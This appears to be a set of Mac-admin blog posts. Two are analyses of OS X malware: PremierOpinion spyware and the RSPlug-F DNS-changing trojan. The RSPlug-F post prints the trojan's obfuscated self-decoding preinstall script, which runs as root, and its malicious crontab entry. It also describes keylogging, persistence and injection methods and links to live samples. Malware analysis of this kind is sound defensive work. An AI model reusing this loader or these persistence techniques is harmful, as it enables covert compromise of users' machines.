Updated: I’ve linked text files of string dumps to the binaries thoughout the article, I suppose not everyone wants to install and run the code to find out themselves!

Another OS X malware media darling is out there, but it’s not the DNS changing kind that RSPlug-F was. Rather this one has a lot more code in it, active code that is watching keystrokes, monitoring AIM, MSN, Yahoo, and iChat messengers and more.

So I found a sample (this is the actual installer careful, folks) in the MishInc FLV To MP3 converter. Which is just a .jar file, put .zip at the end and you can see the guts when expanded. However, it’s a self extracting installer using iZPack so it’s easier just to run it and let it unpack. Here’s some screenshots:

Nothing much in there

Jackpot on the 2nd screen, here’s the goods. Note, if you click I disagree, the software is not installed! Not too mal. Here’s the text from VoiceFive‘s agreement:

In order to provide this free download of MiMAC FLV To Mp3 Converter, PremierOpinion software, provided by VoiceFive, Inc., is included in this download. This software allows millions of participants in an online market research community to voice their opinions by allowing their online browsing and purchasing behavior to be monitored, collected, and once anonymized, used to create market reports, materials and other forms of analysis that may be shared with our clients to help our clients understand Internet trends and patterns and other market research purposes. The information which is monitored and collected includes internet usage information, basic demographic information, certain hardware, software, computer configuration and application usage information about the computer on which you install PremierOpinion.

We may use the information that we monitor, such as name and address, to better understand your household demographics; for example, we may combine the information that you provide us with additional information from consumer data brokers and other data sources in accordance with our privacy policy. We make commercially viable efforts to automatically filter confidential personally identifiable information and to purge our databases of such information about our panelists when inadvertently collected.

By clicking I Agree, you acknowledge that you are 18 years of age or older, an authorized user of this computer, and that you have read, agreed to, and have obtained the consent to the terms and conditions of the Privacy Statement and User License Agreement from anyone who will be using the computer on which you install this application.

Does anyone else find it odd that they say your info is anonymized, but then go on to use an example of information they monitor is name and address?! But not worry, commercially viable efforts will be used to filter that out. Does that mean if it’s too expensive they won’t bother doing a really good job? Nonetheless for this installer, if you say I Disagree you are able to continue to install the MP3 converter without PremierOpinion installing.

But let’s say: I agree for the heck of it

First it drops two files in /private/tmp: script.sh which simply makes the other file, poinstaller, executable. If you are connected to the internet it then downloads two folders: installtmp and tapinstaller, both folders have the exact same binary called PremierOpinion(496KB), installtmp has a different sized poinstaller binary and tapinstaller contains upgrade.xml, which contains a link to a file called rule14.xml, found on a server at post.securestudies.com. Downloading rule14.xml from them you get a link to the latest PremierOpinion.zip and the version numbers of the expected support libraries and essential files.

pointsaller has some Applescript to open the survey window in Safari and things like getting “campaign ids”, doing shell scripts with admin privileges, references to MacSniffer (a TCP packet sniffer), and more. Also while looking at the strings of poinstaller you’ll find reference not only to post.securestudies.com found but also it.kingroutecn.com which has the same rule14.xml but instead of PremierOpinion you get PermissionResearch. Doing some digging, it can be discovered that VoiceFive, Permission Research (which has many screensavers to download), and Premier Opinion are all in the same network block as ComScore, a multi-headed hydra of consumer buying insight.

Now back to the Chinese server (which is not used to download the payload, perhaps, only in China?) digging it.kingroutecn.com gives you 218.108.8.85, doing a reverse lookup gives  hidden-master.hzman.net, doing a reverse lookup gives you 127.0.0.1 that is you!? Whois on it.kingroutecn.com and hidden-master.hzman.net will point to Hangzhou, China, a very big city just southwest of Shanghai (it looks smoggy in Google Maps). The question is why are their two similar packages being served from the US and China? And why is the Chinese version newer (2.3.0.69 vs. 2.2.0.59)?

Anyway, Woodward and Bernstein aside, during all this unpacking of files in /private/tmp an authentication window asking for system.privelege.admin, that is to say, it wants root privileges. If you say yes, you’ll get a launchd daemon running as root installed to /Library/LaunchDaemons/PremierOpinion.plist, it’s an on-demand daemon that will respawn the PremierOpinion process if you try killing it in Activity Monitor. Respawning calls the RunPremierOpinion.sh script from /Application/PremierOpinion folder, it checks to see if you have Access for Assistive Devices enabled this is essential to logging your keystrokes. It does this by simply touching /private/var/db/.AccessibilityAPIEnabled, which can only be done by root, but it’s already running as that no prob! What’s weird about this file is that when you turn on Access for Assistive Devices via the GUI in System Preferences it creates the file with the single character ‘a’ but OS X will still activate the service if the file is created  and is 0 bytes. After installing a Safari window will pop up asking you who uses the computer, the ages of the folks using it, and other tidbits, you can see here. When this app upgrades itself you will find a folder at /private/tmp/autoupgrade which has the same contents of /Applications/PremierOpinion.

So /Applications/PremierOpinion has quite a few things inside, libraries, scripts, and an Uninstaller (?!), and PremierOpinion.app. Inside the app is some Code Signing, the binary (a much bigger 3.6MB version), and in Resources it contains survey.nib, systemtray.nib and InjectCode.app, which inside has code from Jonathan Rentzsch used for mach code injection*, taken from Growl’s 1.2 source code and recompiled by user huangxianghua as seen in the string: /Volumes/10.5/Users/huangxianghua/Downloads/Growl-1.2-src/external_dependencies/mach_star/mach_inject_bundle/mach_inject_bundle

Further and further down the rabbit hole, but let’s just run the Uninstaller. It deletes the folder in Applications but the process remains as well as the LaunchDaemon and all the files in /private/tmp, however on reboot the process is indeed not running, /private/tmp is cleaned out, but the LaunchDaemon and Assistive Access remains on.

So here’s an uninstall script of my own (disconnect all network conections first, in case it is logging keystrokes, it might grab your password):

sudo launchctl unload -w /Library/LaunchDaemons/PremierOpinion.plist
sudo rm /private/tmp/poinstaller
sudo rm /private/tmp/script.sh
sudo rm -rf /private/tmp/installtmp
sudo rm -rf /private/tmp/autoupgrade
sudo rm -rf /private/tmp/tapinstaller
sudo rm -rf /Applications/PremierOpinion
sudo rm /private/var/db/.AccessibilityAPIEnabled

That should do it.

For extra insight, try running the PremierOpinion or PermissionResearch binary from the command line as root, there is all sorts of info to be found when it writes to stdout, such as when it starts a service port 8254: 2010-06-03 15:59:06.175 PermissionResearch[1658:60f] Starting server on port 8254 and, surf around a little, it’ll  report on the YouTube videos you are watching and other things it deems interesting.

Extra extra credit run a Sample on it from Activity monitor and see what it’s doing: FileInventoryTask::MainTask(void*), file inventory eh, that’s why it’s eating up 30% of my CPU!

Hmmm, enough rabbit hole adventures for today, comments are welcome.

Oh yes, and  PowerPC  folks don’t worry, they didn’t compile for PPC

*Update:

To go on further about the injection aka Method swizzling code. This is where you have your code respond to a message call instead of the original code, the power in this is that you can get in the middle of the internal calls and do what you will with their data but then pass them on to the original method. So they probably are swizzling methods in Safari or perhaps at the network layer so they can see what you are downloading, watching, etc. Combined with packet sniffer ‘all your data are belong to them’. However please take note that these the reason this app can do this is because you’ve given them the keys to the castle by authenticating it as root, the technologies it’s leveraging aren’t inherently nefarious, rather fundamental and and essential to system operation, if root can’t do it then who can? This is where either it falls on the user or the OS needs to be better about protecting the user from themselves, perhaps the OS could sandbox downloaded apps with very restrictive settings, alerting you when it attempts something privileged, although this can desensitize a user quickly to clicking Agree. Nonetheless this is a defining conundrum of this century. The power of personal computers is being subverted for the nefarious gain of others and we need to defend against it, the era of curated computing might be ushered in because of this. We’ve seen it so many times, when good things get used for bad purposes, there’s a sea change. Crises precipitates change.

So here’s the deal: since iTunes version who-the-hell-knows it’d go to the mini player when you press Command-Option-Z, then iTunes 9 changed it all and made it fill the screen. iTunes 9.0.1 restored the Zoom functionality, then 9.0.3 took it away. So…

Now for mini Player you have to do a Command-Shift-M
I can’t do that with my left hand alone! That’s how I used to work!
Right hand on the mouse, left hand by the keyboard.
Now it’s two handed operation. Boo.

Update:
It might be possible with a modified “I love you” hand sign to accomplish this, which is ironic since I don’t like this key combo at all!

This is because it looks for SRV records in DNS that are only available at the domain level.
So trying dc01.meco.com it will look for _ldap._tcp.dc01.pretendco.com and not find it.

However a lookup of _ldap._tcp.pretendco.com if set up properly will work.
dig -t SRV _ldap._tcp.pretendco.com

The misleading label of “Server Address” is the culprit.
It should read Domain Name.

Hope that helps some people…
(Now I just need to get the AD admin at my work to get the _gc._tcp SRV record published!)

You can work it open with a putty knife. Avoid the red areas at the top, that is the extent of the arms of the ribbon cable inside, a putty knife will wreck them quite quickly.

Once you worked the putty knife all around the safe areas, attempt to pull the white plastic bottom (with a metal backer glued to it) open like a book, pivoting on the area you couldn’t work around.

That’s about it… You can unscrew the USB interface from the white plastic well, but the cord is captive, because the wires are soldered to the board. You can desolder the wires from the board or snip the white plastic if you want take the board out.

The keyboard itself is attached to the aluminum top with 147 welds, rather than the ~30 screws it used to have.

I was able to pull it off using some vice grips on a corner I pried up.
There’s no going back after this, both frames will bend and warp as the welds pop off.

So you’ll be left with a bunch of keys still attached to the keyboard on little white plastic clips in various ways.

These keys are all attached the same and are easy to take off: Top row keys, arrow keys, Option, Command, Shift, return, tab, caps lock, Space.
They will have a plastic mechanical that has small plastic tabs in the metal frame, just push the tiny nub out of the fram and key is free.
The letter keys however I found difficult, the key top can be taken off easily by pulling up sideways but the plastic underneath is hooked on top and bottom by the metal frame. It needs to be pushed from the bottom toward the top and a black stick put under the top corner so it pops off the frame’s hook, the same can be done, for the other side, or if you twist it right, it will unhook from the bottom and come off.

After you have taken all the bottom plastic key mechanicals off, you can easily take off the two plastic layers.

The top layer is a simple plastic sheet with the rubber nipples that press down and give the keys spring.

The next layer is new, what was once three sheets (two sheets of circuit traces and a buffer in between) is now one laminated whole . While you’d hope this makes the keyboard more impervious to spills and perhaps it does, it precludes the ability to wash and dry like the old keyboards. (You had to act quick though, coffee and coke eat though the traces really fast!) Putty knives are also really bad for circuit traces (see the mangled ribbon cable)

Well that’s about all I learned, next time perhaps I will try simply soaking the keyboard in water then drying for a week or two, but a chance at some first hand dissection was too tempting.

This might only affect those who are using Fink or building your apps, or those who like things to be right.

Append these lines to /etc/profile, using sudo nano /etc/profile
HOSTTYPE=i386
MACHTYPE=i386-apple-darwin8.0
export HOSTTYPE
export MACHTYPE

Now the one thing this won’t do is affect the 5th element of the BASH_VERSINFO array, it seems to be readonly… so if you are very adventurous you can go into /bin/bash with a Hex Editor and overwrite the first two ‘powerpc’ references with i386 (the second set of powerpc refs are correct that is the ppc portion of the fat binary), don’t move the start of of string, just pad the end with zeros (NULL) and it will affect this variable as well.

Alright, now it’s in “The Google”

So, being the curious guy I am I decided to download the very same file Graham did in his demo. While, hdtvxvid.org had since fixed their hijacked page, luckily the status bar had a readable URL that with some squinting I was able to decipher it… So I downloaded the sucker, you can too!

Live Code: OSX/RSPlug-F trojan

And what else can I say but: I’ll be darned if I can get the thing to work! Actually I do get it to work, but due to some coding errors out of the box, it’s a dud.

So let’s start the dissection:

The URL downloads HDTVPlayerv3.5.dmg, inside is contained install.pkg, which if you’re using Safari on a Mac and have the damnable default of “Open ‘Safe’ files after Downloading” it’ll go right to the installer. Which let me note Open “Safe” Files after downloading is the stupidest thing to happen to browsers since Active-X. The air quotes around “Safe” do not help, Apple, it’s a sly wink and a nod that no file type is totally safe but *shrug* whatcha gonna do? I’ll tell you what: don’t make it a dang default!

Firefox is not off the hook either, let me bring up the poisonous Firefox convenience: “predownloading”. Did everyone notice how the virus alert for Graham pops up before he clicks save? How Firefox initiates downloads immediately to cache and upon the user clicking Save it copies it to the destination or if the click Cancel it stays there. I think Firefox’s behaviour is ridiculous, yes it might make me happy when I download some ginormous game demo and come back hours later having forgotten to click Save and am pleasantly surprised that “hey it’s already here!”, but otherwise let me decide what and when something goes on my hard drive.

Anyway… let’s look at an Installer window the average user won’t look at: Show Files

./AdobeFlash
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/version.plist

First couple of suspect thing is a single flat file called AdobeFlash and then Mozillaplug.plugin, which is really just the mysterious VerifiedDownloadPlugin. No mention of Cinema eh?

Take a gander in Info.plist of install.pkg to see where it goes:
IFPkgFlagDefaultLocation /Library/Internet Plug-Ins/

So then, why would it need root privileges for an admin writable folder, eh?

IFPkgFlagAuthorizationAction RootAuthorization, for those following along in the Info.plist
Bonus: CFBundleGetInfoString = who cares
Double Secret Bonus:
Resource/en.lproj/Description.plist IFPkgDescriptionDescription = shutdafuckup

Strangely when you look in both the logs created by Installer.app in /var/log/installer.log:
Leopard it says: "admin auth received to install"
Tiger says: "Administrator authorization granted."
I don’t know why you wouldn’t want the logs to clearly state root privileges were given, but there you have it, it doesn’t.

So what does it do with the root privileges? Hmmm? Let’s look in the preinstall/preupgrade scripts which are identical because apparently the author didn’t realize that a preflight script would kill two birds with one stone.

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -37 $0 | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
yksrepsak 777 nigeb
O(2/H178PI@(C%6;EQ&<#-RX"-Y(2/21$1!!52M
.... <SNIP> ....
*4F;DI`8*(B(`A$8*TD(`5T4^<3+4EC-8
`
dne


OK, so it takes the tail of itself , does some sed magic to flip around the reveresed UUEncoded data, spit it out, replace ‘applemac’ with ‘AdobeFlash’ (remember that’s in the bom payload), replace bsd with 7000, gnu with a boolean value that depends on whether there are any arguments when the script is called. Then after all that sed nonsense, names the file the result of uname -p, attempts to execute the file (as root), delete that file, then exit.

Well, we’ll get to the ‘unencrypted’ payload in a sec let’s run this and see what happens leopard-fail anf tiger-fail — they fail. As a consequence, the AdobeFlash is NOT installed, but it is the same code as the preinstall so, still not off the hook here.Let’s see where we’re at:

The root crontab is altered to inlude: * */5 * * * /Library/Internet Plug-Ins/AdobeFlash
Since the script fails, the package does not install, so the crontab pointing to it is useless…

i386 is left in the root, it doesn’t get a chance to delete itself, considering that all those && statements mean “execute the next step only if the last thing completed correctly”, since it fails it doesn’t get deleted.

i386 contains some more backward UUEncoded data with and some more sed replacements, then pipes it all into perl, here’s the perl code it attempts to run, but unfortunately it fails on line 14 and goes no further. But let’s say we fix the code so it can talk to the server, get a response, and parse the output into a file…

685 is downloaded to /tmp where it runs, does some more sed string swaps, secret decoder ring translations for the DNS servers, outputs this — the nasty part that changes your DNS entries, then deletes the temp file. It makes good use of the very handy concept of “here documents” to script scutil to change the DNS servers, which seem to rotate, you’ll get new servers everytime you run it, suffice to say, the Ukranian subnet of 85.255.112.xxx is totally compromised, as well as 94.247.2.109 the Latvian server from which the files are downloaded. But who knows who’s financing and running it in this global day and age. But the propensity for matryoshka style nested code seems telling

Running some dig commands to get DNS answers from the servers reveals they are given back valid addresses, currently, but I only tested a few sites, it might only have redirection for select dummy bank sites they have set up, who knows…

The lesson here is: Always use Installer to look at the Files, see what your authorization level is, check out the pre/post scripts and generally do what only 1% of the most vigilant of the population would do and you’ll be fine. Hopefully, root authorization will carry more weight in the Installer.app UI and say “Hey are your sure you want to grant root — REALLY!?”, pre/postflight scripts will be easier to look in UI (I am dreaming aren’t I), the logs won’t lie about the auth level (very do-able), and Firefox will respect my wishes and only truly Save when I click Save… (it’s open source, easy to change, but it’ll take a flame war to settle it)

Until then, I hope you enjoyed this malware tour, stay safe and away from porn sites with 3rd party HD codecs.

Update:
I suppose it’d be helpful to add some instructions on how to reverse the scutil modifications, here’s the script (the code might look familiar)

#!/bin/sh
if (( $(id -u) != 0 )); then echo "Please run with sudo" && exit 1; fi
PSID=$( (/usr/sbin/scutil | /usr/bin/grep PrimaryService | /usr/bin/sed -e 's/.*PrimaryService : //')<< EOF
get State:/Network/Global/IPv4
d.show
quit
EOF
)

/usr/sbin/scutil << EOF
remove State:/Network/Service/$PSID/DNS
quit
EOF

echo "Please toggle your network adapter on/off to refresh DNS servers from DHCP"

Basically it nukes the DNS entries that got hosed, then pulls down the DHCP info, uless you have manually entered DNS settings, in which case, you should know what you’re doing.

9G2133 (new):
-rwxr-xr-x 1 root wheel 84400 Sep 24 17:21 PlistBuddy

9G55 (old):
-rwxr-xr-x 1 root wheel 73792 Apr 7 2008 PlistBuddy

What’s changed with PlistBuddy is this:
* Now, exits with non-zero status on failure (like the man page says)
* Writes errors to stderr instead of stdout

What this might mean to you is if you have a script that tests the stdout of PlistBuddy to detect errors, instead of the exit code (which hasn’t worked until now) then that script might just keep going and going and going…

For example: I use  PlistBuddy to add icons to the Dock in custom pkgs I make for work. So the other day when I ran the base packages, Adobe Acrobat being one of them, it just kept going, never fininshing, looking in install.log I found my script stuck in a loop, counting ever higher…

Mar 23 12:42:45 BlankMacBookUni runner[641]: postflight[648]: Print: Entry, "persistent-apps:546217:tile-data:file-label", Does Not Exist

In about 30 mins it had gotten up to 546,217 attempts to read the Dock plist (thas’ a big log file!). Since my script was testing the stdout string which was now blank because it was going to stderr, it didn’t know it reached the end!

To illustrate how I changed the code to compensate for either version, here’s the snippet that will detect if it is at the end of the plist, based on the output (or lack thereof):

Old code:
if [[ "$output" == *Does\ Not\ Exist ]]; then

New Code:
if [[ "$output" == *Does\ Not\ Exist ]] || [ -z "$output" ]; then

So, we’ll see if this is rolled into 10.5.7, probably. For Tiger, I use the PlistBuddy found in /Library/Receipts/iTunesX.pkg/Contents/Resources/, as of iTunes 8.1 it is still the older version.

Hope this of use to someone. Thanks for reading.

/System/Library/CoreServices/SystemVersion.plist

/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd-helper

/System/Library/CoreServices/backupd.bundle/Contents/Resources/fvimagetool

/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow

/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros.kext/Contents/MacOS/AirPortAtheros

/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AppleAirPortBrcm4311.kext/Contents/MacOS/AppleAirPortBrcm4311

/System/Library/Extensions

/System.kext/PlugIns/BSDKernel.kext/BSDKernel

/System/Library/Extensions

/System.kext/PlugIns/IOKit.kext/IOKit

/System/Library/Extensions

/System.kext/PlugIns/Libkern.kext/Libkern

/System/Library/Extensions

/System.kext/PlugIns/MACFramework.kext/MACFramework

/System/Library/Extensions

/System.kext/PlugIns/Mach.kext/Mach

/System/Library/Extensions

/System.kext/PlugIns

/System6.0.kext/kernel.6.0

/System/Library/Extensions

/System.kext/PlugIns/Unsupported.kext/Unsupported

/System/Library/Filesystems/AppleShare/afpfs.kext/Contents/MacOS/afpfs

/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Support/mds

/System/Library/LaunchDaemons/com.apple.backupd-attach.plist

/System/Library/LaunchDaemons/com.apple.backupd-auto.plist

/System/Library/LaunchDaemons/com.apple.backupd-wake.plist

/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages/usr/share/man/man1/tmdiagnose.1

Here’s hoping that the update in tandem with the Airport/Time Capsule fixes some of the problems people have had with using a hard drive as an Airport disk on the Airport Extremes. For me it wasn’t even about Time Machine, the real pain was transfers were SLOW even over the 100Mb/s Ethernet (dangit I jumped the gun and didn’t get the GigE model) and sometimes the Airport Disk couldn’t be mounted on my computers until the Airport was restarted. Also with the update the ever mysterious Wide Area Bonjour prefs are still around, they are in the Name-Edit… button now.One more thing…/usr/share/man/man1/tmdiagnose.1: Hmmm, is this a Time Machine diagnostics tool?Let’s have a look at the man page or this one:tmdiagnose(1) BSD General Commands Manual tmdiagnose(1)NAME tmdiagnose, Other_name_for_same_program(), Yet another name for the same program. — This line parsedfor whatis database.

tmdiagnose(1)             BSD General Commands Manual            tmdiagnose(1) 

NAME

     tmdiagnose, Other_name_for_same_program(), Yet another name for the same program. — This line parsed

     for whatis database.

SYNOPSIS

     tmdiagnose, [-abcd] [-a path] [file] [file ...] arg0 arg2 …

DESCRIPTION

     Use the .Nm macro to refer to your program throughout the man page like such: tmdiagnose, Underlining

     is accomplished with the .Ar macro like this: underlined text.

     A list of items with descriptions:

     item a   Description of item a

     item b   Description of item b

     A list of flags and their descriptions:

     -a       Description of -a flag

     -b       Description of -b flag

FILES

     /usr/share/file_name                          FILE_1 description

     /Users/joeuser/Library/really_long_file_name  FILE_2 description

SEE ALSO

     a(1), b(1), c(1), a(2), b(2), a(3), b(3)

Darwin                           April 2, 2008                          Darwin

 

 Only a dummy man page. And no executable to be found. Its origins though are from the BSD package (see /Library/Receipts/boms/com.apple.pkg.BSD.bom) No change has been made to this man page since 10.5 but yet it is included with this update? Odd. My guess is that there is an Apple internal tool in use but not something for the general public. I mean why would the ‘Rest of Us’ need to diagnose Time Machine?!It’ just works right?